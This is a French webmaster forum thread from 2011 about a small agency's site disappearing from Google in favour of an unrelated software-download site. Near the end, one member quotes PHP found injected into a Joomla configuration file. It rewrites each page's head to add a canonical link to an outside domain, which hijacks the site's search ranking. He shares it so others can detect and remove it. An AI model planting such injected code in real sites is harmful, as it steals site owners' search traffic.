Un site américain à pris "ma place" sur Google

Discussion dans 'Problèmes de référencement spécifiques à vos sites' créé par sidecom, 10 Avril 2011.

  1. sidecom
    sidecom Nouveau WRInaute
    Inscrit:
    24 Mai 2010
    Messages:
    10
    J'aime reçus:
    0
    Bonjour,

    Depuis ce matin, mon site n'apparait plus sur Google. En regardant de plus près, je me suis aperçu qu'un site avait pris "ma position" sur le moteur. Par exemple si tape le nom de mon site Internet, ce n'est plus mon site qui apparait en première position mais un site américain. Même constat si je recherche mon site avec des mots clés. Ci-joint, une capture d'écran.

    J'ai regardé sur mon hébergeur pour voir les derniers fichiers modifiés mais rien me semble anormal... Mon site fonctionne également correctement. Pas de fichiers douteux en vus.

    Si quelqu'un pourrais m'aider parce que là j'avoue, je suis un petit peu dépassé. :roll: C'est la première fois que je suis confronter à ce genre de problème :?

    Merci d'avance à ceux qui prendront le temps de se pencher sur mon cas.

    [​IMG]
     
  2. Zecat
    Zecat WRInaute accro
    Inscrit:
    1 Mars 2005
    Messages:
    9 176
    J'aime reçus:
    1
    Re: Un autre positionné à ma place sur Google

    TA place ? :roll:
     
  3. sidecom
    sidecom Nouveau WRInaute
    Inscrit:
    24 Mai 2010
    Messages:
    10
    J'aime reçus:
    0
    Re: Un autre positionné à ma place sur Google

    Je me suis mal exprimé. Je veux dire qu'il apparait lorsque je tape le nom de mon site ou mes mots clés. Mon site lui a complètement disparu.
     
  4. MikeR
    MikeR WRInaute passionné
    Inscrit:
    9 Janvier 2010
    Messages:
    1 416
    J'aime reçus:
    0
    Re: Un autre positionné à ma place sur Google

    C'est un affichage payant pour être en haut de page. Mais chez moi, il n'apparait plus. Sur ta recherche, tu es en première position sur gg.fr (et lui en deuxième). Par contre, il est naturellement en première sur gg.com, où toi, tu n'apparais pas du tout.
     
  5. sidecom
    sidecom Nouveau WRInaute
    Inscrit:
    24 Mai 2010
    Messages:
    10
    J'aime reçus:
    0
    Mon site n'apparait pas du tout sur Google. Dans le cadre rouge, je montre le site qui apparait à la place de mon site.

    Encore hier c'était mon site "Sidec****.fr " qui apparaissait. Mon site a complétement été remplacé par ce site (SyncBackPro 5.8.7.23 | givemesoft.eu). Ce site n'a rien à voir avec la communication.

    Lorsque je tape : agence de comm... à Perpignan, c'est encore ce site qui revient en 3 ème position. Encore hier j'étais positionné en 3ème position. Mon site n'apparait plus du tout sur Google ...

    Ce site à bien trouvé le moyen d'apparaitre à ma place lorsqu'on veut accéder à mon site via google. J'aimerais bien savoir comment :roll:
     
  6. sr
    sr WRInaute passionné
    Inscrit:
    15 Mai 2003
    Messages:
    1 149
    J'aime reçus:
    0
    Je ne sais pas comment ce site est arrivé là (pas le temps, je pars en vacances).
    Mais sur la requête que tu indiques sur ta copie d'écran, ton site est 4ème sur google.fr
     
  7. franckM
    franckM WRInaute impliqué
    Inscrit:
    15 Novembre 2007
    Messages:
    808
    J'aime reçus:
    0
    Effectivement le site apparaît avant toi sur le mot side******.fr.
    Ce qui est étrange, c'est que à gauche, si on clique sur "Pages en français" le classement redevient normal non ?

    J'ai exactement le même problème avec un mot clé mais qui est assez concurrentiel. Si on tape le mot clé dans sur google.fr, les résultats d'aujourd'hui sont complètement bizarre (plusieurs "gros sites" disparaissent de la première page) et en cliquant sur "Pages en français" le classement reprend ses positions d'origine.
     
  8. Dolph
    Dolph WRInaute impliqué
    Inscrit:
    1 Mars 2011
    Messages:
    556
    J'aime reçus:
    0
    C'est toujours marrant de voir les gars se démener pour se retrouver 1er lorsqu'ils sont loggué.

    Déloggue toi, vide ton cache et regarde où tu est.
    On ne fait jamais de test de positionnement loggué.
     
  9. Madrileño
    Madrileño Membre Honoré
    Inscrit:
    7 Juillet 2004
    Messages:
    32 079
    J'aime reçus:
    282
    Pareil que Sr. Rien de spécial.
     
  10. CodingPapa
    CodingPapa Nouveau WRInaute
    Inscrit:
    29 Septembre 2010
    Messages:
    38
    J'aime reçus:
    0
    Idem, sur Google.fr en requête standard ton site apparaît 4ème et tu redeviens premier sur une requêtes "en français".

    Ce qui est étonnant dans cette affaire c'est le positionnement de ce site sur cette expression alors que la page ne contient aucune occurrence de ces 2 mots :?
    De même la plupart des outils ne voient peu ou pas de liens entrants pour ce site et notamment aucuns vers cette page ... comment s'est-elle donc retrouvée positionnée sur cette expression ? :roll:
     
  11. franckM
    franckM WRInaute impliqué
    Inscrit:
    15 Novembre 2007
    Messages:
    808
    J'aime reçus:
    0
    Qu'est ce qui te dis que j'étais logué ?

    En l'occurrence, je ne l'étais pas et je ne fais jamais de tests de positionnement en étant logué.
     
  12. finstreet
    finstreet WRInaute accro
    Inscrit:
    10 Juillet 2005
    Messages:
    13 473
    J'aime reçus:
    2
    Tiens ca me rappelle le bug Wiki d'il y a quelques semaines où Wiki US passait devant Wiki France pour des requêtes françaises.
     
  13. Dolph
    Dolph WRInaute impliqué
    Inscrit:
    1 Mars 2011
    Messages:
    556
    J'aime reçus:
    0
    Sans déconné, t'a vu le screen ?

    Déloggue toi, vide tes cache, refais un screen et compare le avec le premier. ;-)
     
  14. elembius
    elembius WRInaute occasionnel
    Inscrit:
    9 Juin 2010
    Messages:
    353
    J'aime reçus:
    0
    euh j'ai pas vu l'url de ton site mis a part une page facebook et une google adresse...
    as tu réellement une adresse d'un vrai site internet? tu as l'adresse side-communication....? ou pas?
     
  15. franckM
    franckM WRInaute impliqué
    Inscrit:
    15 Novembre 2007
    Messages:
    808
    J'aime reçus:
    0
    Ah ? et bien relis le fil du topic et commences déjà à parler à la bonne personne avant d'avoir réponse à tout, je n'ai envoyé aucun screen..."sans déconner"
     
  16. alain78france
    alain78france WRInaute occasionnel
    Inscrit:
    1 Mars 2006
    Messages:
    465
    J'aime reçus:
    0
    idem chez moi
     
  17. Madrileño
    Madrileño Membre Honoré
    Inscrit:
    7 Juillet 2004
    Messages:
    32 079
    J'aime reçus:
    282
    Votre entreprise réalisant du référencement, avez-vous demandé à votre collègue qui s'occupe du référencement pour savoir s'il n'y avait pas eu une modification qui peut expliquer ce changement, c'est peut-être une mise à jour réalisée par le référenceur.
     
  18. Dolph
    Dolph WRInaute impliqué
    Inscrit:
    1 Mars 2011
    Messages:
    556
    J'aime reçus:
    0
    lorsque je répond à la base à l'auteur du topic, qui lui à mis un screen, tu evite d'entrer dan la conversation, ça évitera les quiproquo. ;-)
     
  19. cedric_g
    cedric_g WRInaute accro
    Inscrit:
    18 Janvier 2006
    Messages:
    2 962
    J'aime reçus:
    1
    Salut

    Je vois son site 4ème dans Google.fr (en cliquant sur "Résultats en français")
     
  20. lunicrea
    lunicrea WRInaute occasionnel
    Inscrit:
    30 Août 2010
    Messages:
    479
    J'aime reçus:
    1
    Salut.

    Heu, je vois dans les SERPs sur l'expression "side communication" 1 chose qui m'a troublé : Un site qui se nomme -www.sidecom.fr et un autre site -www.sidecommunication.fr.

    J'ai bien vu que ces 2 sites sont de la même société (la tienne en l'occurence) mais est-ce réellement une bonne idée de créer un site "portail" avec comme contenu des phrases à mots clés (-www.sidecom.fr) pointant vers l'url -www.sidecommunication.fr ?

    De mon point de vue, c'est prendre 2 places dans les SERPs dont une qui est inutile car je pense que Google sait que le site "portail" n'est pas pertinent.

    Enfin, ce n'est que mon avis ...
     
  21. ybet
    ybet WRInaute accro
    Inscrit:
    22 Novembre 2003
    Messages:
    7 516
    J'aime reçus:
    1
  22. ybet
    ybet WRInaute accro
    Inscrit:
    22 Novembre 2003
    Messages:
    7 516
    J'aime reçus:
    1
  23. sidecom
    sidecom Nouveau WRInaute
    Inscrit:
    24 Mai 2010
    Messages:
    10
    J'aime reçus:
    0
    Le site dont vous parlez n'est pas mon site Internet...
    J'ai trouvé la solution en contactant mon prestataire. Merci à ceux qui ont essayé de se rendre utile. Difficile d'ailleurs de suivre leurs réponses avec tous ces gens qui postent des messages complètement à coté de la plaque ...
     
  24. sidecom
    sidecom Nouveau WRInaute
    Inscrit:
    24 Mai 2010
    Messages:
    10
    J'aime reçus:
    0
    Tu ne fais pas référence au bon site Internet :arrow:
     
  25. sidecom
    sidecom Nouveau WRInaute
    Inscrit:
    24 Mai 2010
    Messages:
    10
    J'aime reçus:
    0
    A coté de la plaque, aucun rapport avec le problème.
     
  26. finstreet
    finstreet WRInaute accro
    Inscrit:
    10 Juillet 2005
    Messages:
    13 473
    J'aime reçus:
    2
    C'est le problème des gens qui EXIGENT une réponse détaillée mais qui ne donnent même pas l'url de leur site
     
  27. Dolph
    Dolph WRInaute impliqué
    Inscrit:
    1 Mars 2011
    Messages:
    556
    J'aime reçus:
    0
    C'est pour cela qu'il n'y a que toi que le vois 1er ou 2e...

    Pourquoi tout le monde le vois 4e ?
    Parce que toi, tu es soit loggé, soit t'a des cookies GG qui trainent.

    mais c'est pas grave, continue comme ça, ça aide tes concurrents.
     
  28. sidecom
    sidecom Nouveau WRInaute
    Inscrit:
    24 Mai 2010
    Messages:
    10
    J'aime reçus:
    0

    Pour ce genre de question il n'y a pas besoin de l'adresse du site. Je ne préfère pas donné l'adresse du site de la société en question pour que les messages ne soit pas associés à l'entreprise sur Google.

    Certain m'ont donné des solutions sans avoir l'adresse de mon site. D'autres me l'ont demandé en mp. Ceux qui croyaient connaitre l'adresse de mon site ne m'ont pas donnés de solutions mais se sont concentrés sur le contenu du site.

    Dolph, je ne suis pas en 3ème et 4ème. Je n'y suis pas du tout. En 4ème c'est un site qui parle de mon site mais ce n'est pas moi... Je ne dis pas que j'ai baissé sur google mais que je n'y étais plus NUANCE. Donc je ne me démène pas pour être en 1er... Nous le sommes de toute façon sur certain mots clés et c'est ingagnable. On a travaillé pour...

    Ne parle pas au nom de tout le monde car certains m'ont donnés de très bons conseils et on toutafais compris le problème. J'ai contacté Brioude Internet, mon référenceur qui a résolu le problème. Une histoire de mise à jour (un membre avait bien vu). Cela devrait rentrer dans l'ordre d'ici quelques jours.

    Mais par contre Dolph, évite ce genre de commentaire ... Je ne suis pas venu ici pour avoir des remarques de ce genre.

    Par contre je remercie les autres pour leur aide. :)
     
  29. sidecom
    sidecom Nouveau WRInaute
    Inscrit:
    24 Mai 2010
    Messages:
    10
    J'aime reçus:
    0

    Réponse de mon prestataire :


    Mauvaise mise à jour du CMS. Une partie du site tourne sur Joomla. Mon collègue qui s'occupe du site est passé de Joomla 1.5 à 1.6 ces derniers jours en n'oubliant de configurer correctement les paramètres du CMS. C'est donc pour cela que googlebot n'a pas pris en compte la page index. D'après le "référenceur" cela devrait rentrer dans l'ordre d'ici les prochains jours. Pour le site américain... il pourrait y avoir un plus gros soucis... il va regarder et me tenir au courant.
     
  30. Dolph
    Dolph WRInaute impliqué
    Inscrit:
    1 Mars 2011
    Messages:
    556
    J'aime reçus:
    0
    Ok, je me suis gouré dans ton ndd, mais ça n'empêche que ton screen montre que tu étais connecté ou que tu n'avais pas nettoyer ton cache.
    Ce qui de toute façon, fausse les résultats.
     
  31. pinrolland
    pinrolland WRInaute impliqué
    Inscrit:
    19 Août 2010
    Messages:
    730
    J'aime reçus:
    1
    ça a sans doute rien à voir ,
    mais quand vous "angliciser" vos noms de société (genre side & communication à perpignan :mrgreen: )c'est pour attirer du contact anglosaxon ?? c'est pas l'inverse qui se produit ??
     
  32. franckM
    franckM WRInaute impliqué
    Inscrit:
    15 Novembre 2007
    Messages:
    808
    J'aime reçus:
    0
    Salut,

    Où vois tu ça dans les résultats du moteur sur le screen ?
     
  33. sidecom
    sidecom Nouveau WRInaute
    Inscrit:
    24 Mai 2010
    Messages:
    10
    J'aime reçus:
    0
    Si mon objectif était de montrer mon positionnement réel sur Google, peut être que je me serais déconnecté et que j'aurais nettoyer mon cache mais ce n'était pas le but. :D
     
  34. sidecom
    sidecom Nouveau WRInaute
    Inscrit:
    24 Mai 2010
    Messages:
    10
    J'aime reçus:
    0
    En effet, ça a sans doute rien à voir :lol:
    Ce n'est pas moi qui est choisis ce nom donc je ne pourrais pas vous expliquer le pourquoi du comment.
     
  35. lunicrea
    lunicrea WRInaute occasionnel
    Inscrit:
    30 Août 2010
    Messages:
    479
    J'aime reçus:
    1
    Désolé de m'auto-quote, juste pour savoir si je me goure complètement .

    J'ai vu personne réagir donc je me dis que c'est peut-être une ânerie ce que j'ai dis :?:
     
  36. Dolph
    Dolph WRInaute impliqué
    Inscrit:
    1 Mars 2011
    Messages:
    556
    J'aime reçus:
    0
    Recherche local sur Perpignan, par exemple.
     
  37. franckM
    franckM WRInaute impliqué
    Inscrit:
    15 Novembre 2007
    Messages:
    808
    J'aime reçus:
    0
    Source:
    https://www.google.fr/support/websearch/bin/answer.py?answer=179386&hl=fr

    Vides le cache, déloggue toi et tu verras que le résultat géographique est encore présent...
     
  38. Dolph
    Dolph WRInaute impliqué
    Inscrit:
    1 Mars 2011
    Messages:
    556
    J'aime reçus:
    0
    ... bah jamais chez moi.
    Et si je choisi lieu... op, un nettoyage et y est plus.
     
  39. Gui_
    Gui_ Nouveau WRInaute
    Inscrit:
    14 Avril 2011
    Messages:
    1
    J'aime reçus:
    0
    Salut,

    J'ai le même problème.

    Regarde dans le code source de ta page, dans <head></head> et regarde s'il n'y a pas une url canonique bizarre.
    J'ai trouvé un truc bizarre dans la config php -> configuration.php, dans le genre :

    Code:
    function callback($buffer){return (str_replace("</head>", "														<link rel=\"canonical\" href=\"http://crotopole.eu/".substr(md5($_SERVER['HTTP_HOST'].$_SERVER['REQUEST_URI']), 0, 10)."\" />\n</head>", $buffer));}
    ob_start("callback");
    Disponible ici aussi (pas exactement le même -> http://pastebin.com/8n9JqJXD)
    Vu la date, c'est très récent.

    Supprime ça de ton fichier de config.

    Maintenant faut savoir commment ce morceau de code s'est retrouvé et boucher la faille qui a permis ceci.

    Ca m'est arrivé sur un site joomla aussi, mais en version 1.5.22


    Voila, en espérant avoir pu aider ;)
     
  40. nervusdm
    nervusdm WRInaute impliqué
    Inscrit:
    5 Janvier 2008
    Messages:
    616
    J'aime reçus:
    0
    Je pense qu'un petit message pour dire Allez L'USAP était grandement Hors sujet mais c'était important !

    Sinon, ne-serait-ce pas lié au terme "side" qui est anglais ?
     
Chargement...
Similar Threads - américain pris place Forum Date
Connaitre le CA des entreprises americaines? Droit du web (juridique, fiscalité...) 2 Avril 2010
Nouvelle méthode SEO méthode américaine Référencement Google 16 Octobre 2019
Je vais lancer un site en anglais/américain, des conseils svp? Débuter en référencement 5 Mars 2019
Recherche annuaires américain Référencement Google 24 Décembre 2014
Annuaires internationaux ou américains Autres moteurs de recherche connus 1 Octobre 2014
Cloudflare et le référencement - IP américaine? Débuter en référencement 22 Février 2014
Migration de mon site 1&1 vers un hebergeur américain et positionnement Débuter en référencement 13 Février 2014
Hébergement mutualisé américain Développement d'un site Web ou d'une appli mobile 3 Février 2013
Mon premier site américain Noms de domaine et référencement 4 Novembre 2012
Hebergement americain + NDD en .Net = bon référencement en France ? Référencement Google 30 Juillet 2012